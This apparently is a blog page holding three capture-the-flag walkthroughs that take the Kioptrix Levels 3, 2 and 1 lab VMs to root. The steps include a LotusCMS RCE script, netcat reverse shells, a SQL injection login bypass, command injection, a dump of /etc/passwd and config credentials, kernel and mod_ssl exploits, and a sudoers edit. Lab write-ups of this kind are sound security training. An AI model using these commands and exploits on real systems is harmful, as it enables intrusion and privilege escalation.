Writeup for Kioptrix: Level 1.2 (#3)

This is a continuation of the Kioptrix series writeup, level 1.2, Virtual Machine (VM) number 3.

Add target server to list of hosts

lvl-3-000

First of all, let’s modify your hosts file as per instructed by the creator on the website Kioptrix level 1.2 (#3) on Vulnhub, or simply refer to the above screenshot.

We should edit the host file to point the target server to kioptrix3.com. Below is the snippet, I modified it slightly,

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

  • Under Windows, edit C:\Windows\System32\drivers\etc\hosts
  • Under Linux, edit /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this

Perform network discovery on your network to find the host
> nmap -Pn 192.168.117.0/24

Nmap scan report for kioptrix3.com (192.168.117.131)
Host is up (0.00040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:D1:8E:A1 (VMware)

Run Directory Buster
> dirb http://192.168.117.131

—- Scanning URL: http://192.168.117.131/ —-
==> DIRECTORY: http://192.168.117.131/cache/
==> DIRECTORY: http://192.168.117.131/core/
+ http://192.168.117.131/data (CODE:403|SIZE:326)
+ http://192.168.117.131/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.117.131/gallery/
+ http://192.168.117.131/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.117.131/modules/
==> DIRECTORY: http://192.168.117.131/phpmyadmin/

I must say that we have found some interesting sites. Both the modules and phpmyadmin page seems to give us quite a bit of information on its version.

lvl-3-001

lvl-3-002

Now back to normal navigation, they have a normal index page as shown below, and it has links for admin login page.

lvl-3-003

lvl-3-004

Oh, check this out, they uses LotusCMS.

Google for LotusCMS vulnerability

Found an exploitation script, let’s download it
> wget ‘https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh’

Setup listener on your attacker machine
> nc -lvp 6666

Run the exploit
> ./lotusRCE.sh 192.168.117.131

Path found, now to check for vuln….

Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell….
what IP to use?
192.168.117.128
What PORT?
6666

OK, open your local listener and choose the method for back connect:

1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

There you go, your listener should have received a reverse shell now.

connect to [192.168.117.128] from kioptrix3.com [192.168.117.131] 57841

Check your id 
> id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Good, now you have a limited shell as user www-data.

Dump the list of users and see their home directory
> cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Check out the non-standard users, such as loneferret
> cd /home/loneferret/
> ls -l

total 32
-rw-r–r– 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh

View the CompanyPolicy file
> cat CompanyPolicy.README

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command ‘sudo ht’.
Failure to do so will result in you immediate termination.

DG
CEO

Nothing interesting. Now, back to the starting page,
> cd /home/www/kioptrix3.com
> ls

cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php

Perform a search on any PHP files which contains “config” in the file name, maybe we can get some interesting hardcoded information from them
> find . -name ‘*.php’ | grep config

./gallery/gconfig.php
./data/config/index.php

View the configuration file
> cat ./gallery/gconfig.php

[ … omitted]
$GLOBALS[“gallarific_path”] = “http://kioptrix3.com/gallery”;
$GLOBALS[“gallarific_mysql_server”] = “localhost”;
$GLOBALS[“gallarific_mysql_database”] = “gallery”;
$GLOBALS[“gallarific_mysql_username”] = “root”;
$GLOBALS[“gallarific_mysql_password”] = “fuckeyou”;
[ … omitted]

We have gotten a sql login credentials, nice. The other file “./data/config/index.php” is empty though.

The credentials are legit, login success at phpmyadmin!

lvl-3-005

Now is time to use some of your favorite password decrypt website or tools. Once you are done, you will find out that the following are the passwords,

dreg: Mast3r
loneferret: starwars

Login to the server via SSH (remember that now, you are ‘new employees’ as mentioned in the company policy just now)
> ssh dreg@192.168.117.131
> sudo -l

[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.

No luck. Let’s try the other user.

> ssh loneferret@192.168.117.131
> sudo -l

User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

Great. loneferret is allowed to run HT Editor as sudo!

Run the HT Editor as sudo
> /usr/local/bin/ht

From here, we follow the instructions to open the /etc/sudoer file to make modification so we can run other programs as sudo
* Press F3 to open file

lvl-3-006

Enter file name to open (reference as above)
> /etc/sudoers

lvl-3-007

Add the following line in the privilege specification (reference as above)
> /bin/bash
* Press F2 to save

Now run the following to gain root access
> sudo /bin/bash
> id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now root!

Advertisements

Writeup for Kioptrix: Level 1.1 (#2)

This is a continuation from the Kioptrix Virtual Machines (VM) on VulnHub.

Click to view Writeup for Kioptrix level 1 (#1) VM.

lvl-2-000

Let’s get started!

Scan the network using nmap to discover hosts
> nmap -sS -T5 192.168.117.0/24

Nmap scan report for 192.168.117.130

Host is up (0.00018s latency).

Not shown: 994 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

443/tcp  open  https

631/tcp  open  ipp

3306/tcp open  mysql

MAC Address: 00:0C:29:A1:02:89 (VMware)

Navigate to the website using a browser (port 80) 

lvl-2-001

Wow, there is a login page. Let’s test for SQL Injection vulnerability

Enter the following input as the username (take note of the space behind):

‘ or 1=1 — 

And we are in!

lvl-2-002pngNow let’s try the options and see if they works.

lvl-2-003

Well, it works!

Setup netcat listener on your machine, port 6666
> nc -lvp 6666

lvl-2-004

Perform netcat connectivity on target machine and spawn a reverse shell (refer to above image)

192.168.117.128; /usr/local/bin/nc 192.168.117.128 6666 -e /bin/sh

Observe the terminal which you are running the netcat listener

root@kali:~/Desktop/kioptrix# nc -lvp 6666
listening on [any] 6666 …
192.168.117.130: inverse host lookup failed: Unknown host
connect to [192.168.117.128] from (UNKNOWN) [192.168.117.130] 32771
id
uid=48(apache) gid=48(apache) groups=48(apache)

Now you have a shell as user apache.

Check systme kernel version
> uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Google for vulnerability on “Linux kernel 2.6.9-55”

Check out : CVE-2009-2698, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

Download the exploit code to your machine
> cd /tmp
> wget ‘https://www.exploit-db.com/download/9542&#8217;

Transfer the exploit code to the target machine
> service apache2 start
> cd /var/www/html/
> mv ~/Desktop/kioptrix/9542.c .

Download the file from target machine
> wget ‘http://192.168.117.128/9542.c&#8217;

–23:44:28– http://192.168.117.128/9542.c
=> `9542.c’
Connecting to 192.168.117.128:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 280.27 MB/s

23:44:28 (280.27 MB/s) – `9542.c’ saved [2645/2645]

The download is a successful.

Compile your exploit on target machine
> gcc 9542.c
> ls

9542.c
a.out

Run your exploit to get root
> ./a.out

sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Congrats, you have gotten root.

Writeup for Kioptrix: Level 1 (#1)

I came across the Kioptrix Virtual Machines (VM) on VulnHub today and find them pretty interesting. Hence, I attempted some penetration tests on the Kioptrix: Level 1 (#1) and managed to get root (the objective of the game).

A quick background on the VMs found on VulnHub – they are basically VMs which are vulnerable by design – specially created for security researchers or any security enthusiasts (like myself) to perform security testing on them, or to try out known exploits as a form of Proof of Concept (POC).

lvl01_kioptrix_01

I found 2 methods of getting root, one requires some modification to a readily obtained exploit code, while the other one uses the Metasploit tool to automatically get root using a generated payload.

Let’s get started. Before we go into either methods, we need to perform some general reconnaissance to understand what services are there.

Note #1: section description are in bold
Note #2: commands are in Italic form
Note #3: output are in block quote (just like this box)
Note #4: output are trimmed if they are too long.. this is to avoid confusing you with output that are way too long 🙂

Perform an nmap scan to discover target’s open ports & IP address
> nmap -sS -Pn 192.168.80.0/24 -T5

Nmap scan report for 192.168.80.132
Host is up (0.00065s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:3C:27:52 (VMware)

[[[ Method 1 ]]]

Scan for existing SMB services (since port 139 is currently open)
> nbtscan 192.168.80.132

Doing NBT name scan for addresses from 192.168.80.132

IP address NetBIOS Name Server User MAC address 
------------------------------------------------------------------------------
192.168.80.132 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

Perform SMB enumeration (as shown above, there is SMB service on the host)
> enum4linux -a 192.168.80.132

 ======================================== 
| OS information on 192.168.80.132 |
 ======================================== 
[+] Got OS info for 192.168.80.132 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.80.132 from srvinfo:
 KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
 platform_id : 500
 os version : 4.5
 server type : 0x9a03

Google for known vulnerability.

As obvious as it seems to be, yes, we should Google for known vulnerability. As shown in the output, the target system is using Samba 2.2.1a. We will Google for “samba version 2.2.1a vulnerability”

Check out CVE-2003-0201,Samba ‘call_trans2open’  Remote Buffer Overflow vulnerability.

lvl01_kioptrix_02

Now, we can simply launch Metasploit to do the job for you.

msf > msfconsole
msf > search 2003-0201
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set rhost 192.168.80.132
msf exploit(trans2open) > set payload generic/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.80.131:4444 
[*] 192.168.80.132:139 - Trying return address 0xbffffdfc...
[*] 192.168.80.132:139 - Trying return address 0xbffffcfc...
[*] 192.168.80.132:139 - Trying return address 0xbffffbfc...
[*] 192.168.80.132:139 - Trying return address 0xbffffafc...
[*] 192.168.80.132:139 - Trying return address 0xbffff9fc...
[*] 192.168.80.132:139 - Trying return address 0xbffff8fc...
[*] Command shell session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1029) at 2016-10-24 11:06:50 -0400
[*] Command shell session 2 opened (192.168.80.131:4444 -> 192.168.80.132:1030) at 2016-10-24 11:06:51 -0400

id
uid=0(root) gid=0(root) groups=99(nobody)

[[[ Method 2 ]]]

Scan for vulnerability using Nikto
> nikto -h 192.168.80.132

+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Google for known vulnerability.

Once again, we should Google for known vulnerability. As shown in the output, the target system is using a very outdated Apache web server version 1.3.20. We will Google for “apache 1.3.20 vulnerability”

Check out the Apache mod_ssl (< 2.8.7) OpenSSL – ‘OpenFuckV2.c’ Remote Exploit (2)

Search for the exploit via searchsploit
> searchsploit OpenFuck

-------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms)
-------------------------------------------------- ----------------------------------
Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' | ./unix/remote/764.c
Apache mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' R | ./unix/remote/21671.c
-------------------------------------------------- ----------------------------------

Modify the exploit code

Now, simply make a copy of the 764.c exploit and put it somewhere to check it out and make changes to it (because the ‘off-the-shell’ code over there is pretty outdated)
> cp /usr/share/exploitdb/platforms/unix/remote/764.c OpenFuck.c

Here, we need to make some modification to the code before compiling it. you can do it using any text editor. i like to use VIM so I will be running the following command.
> vim OpenFuck.c

From this part onwards, I need you to follow closely. I try to be as clear as possible – if you still got lost along the way, please feel free to leave a comment to clarify.

Below are the list of changes which are need to be made to the OpenFuck.c code,

  1. Include the openssl rc4 and md5 libraries
    • #include <openssl/rc4.h>
    • #include <openssl/md5.h>
  2. Modify the ‘wget’ method in the exploit itself because the url does not exist anymore. we need to update it to become the new URL to download the file.
  3. Search for ‘wget’, and then replace the URL to http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Install Libraries for compiling the modified exploit code

Now we need to install the ssl-dev library into our server or else we will face difficulty compiling the code.
> apt-get install libssl-dev
> gcc -o OpenFuck OpenFuck.c -lcrypto

OpenFuck.c: In function ‘get_server_hello’:
OpenFuck.c:1011:26: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [-Wincompatible-pointer-types]
 ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
 ^
In file included from /usr/include/openssl/objects.h:965:0,
 from /usr/include/openssl/evp.h:94,
 from /usr/include/openssl/x509.h:73,
 from /usr/include/openssl/ssl.h:156,
 from OpenFuck.c:20:
/usr/include/openssl/x509.h:823:1: note: expected ‘const unsigned char ’ but argument is of type ‘unsigned char ’
 DECLARE_ASN1_FUNCTIONS(X509)
 ^

Now, you are done with the mod_ssl exploit!

Running the Exploit

Simply run the compiled file to view its usages,
> ./OpenFuck

: Usage: ./OpenFuck target box [port] [-c N]

target - supported box eg: 0x00
 box - hostname or IP address
 port - port for ssl connection
 -c open N connections. (use range 40-50 if u dont know)


Supported OffSet:
.
.
.
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
.
.
.

Of course, we are only interested in the following 2 types which are designed for Red Hat Linux, using apache version 1.3.20.

Trying out using the 0x6a option ….
> ./OpenFuck 0x6a 192.168.80.132 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

It doesn’t work. next we try the other option,

> ./OpenFuck 0x6b 192.168.80.132 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
--11:33:26-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
 => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--11:33:26-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
 => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 1.87 MB/s

11:33:27 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6362
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And it works. Congrats, you have root now. Either method should work.